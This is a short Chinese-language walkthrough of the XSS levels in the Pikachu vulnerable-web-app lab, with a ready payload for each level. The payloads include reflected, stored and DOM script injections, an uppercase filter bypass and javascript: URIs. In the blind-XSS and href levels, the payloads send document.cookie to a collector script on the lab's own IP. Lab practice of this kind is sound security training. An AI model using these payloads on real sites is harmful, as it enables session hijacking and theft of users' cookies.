pikachu-xss部分速通
🍉
🍉目录
- pikachu-xss部分速通
- 反射型xss(get)
- 反射性xss(post)
- 存储型xss
- DOM型xss、DOM型xss-x
- xss盲打
- xss之过滤
- xss之htmlspecialchars
- xss之href输出
- xss之js输出
反射型xss(get)
payload:
</p><script>alert(1)</script><p>
反射性xss(post)
payload:
</p><script>var cookie = document.cookie;alert(cookie);</script><p>
存储型xss
payload:
<script>var cookie = document.cookie;alert(cookie);</script>
DOM型xss、DOM型xss-x
payload:
javascript:`${alert(1)}`
javascript:alert(2)
javascript:var cookie = document.cookie;alert(cookie);
xss盲打
先说下xss后台用法,如果构造一个请求为http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie=value
那后台就会写入一条cookie信息,相当于模拟了一个xss窃取用户cookie的过程
payload:
<script>document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie</script>
xss之过滤
大写就能绕过
payload:
<SCRIPT>var cookie = document.cookie;alert(cookie);</SCRIPT>
xss之htmlspecialchars
别用特殊符号
payload:
javascript:var cookie = document.cookie;alert(cookie);
xss之href输出
paylaod:
javascript:document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie
单击a标签后,后台是有cookie记录的
xss之js输出
payload:
'</script><script>alert(1)</script>
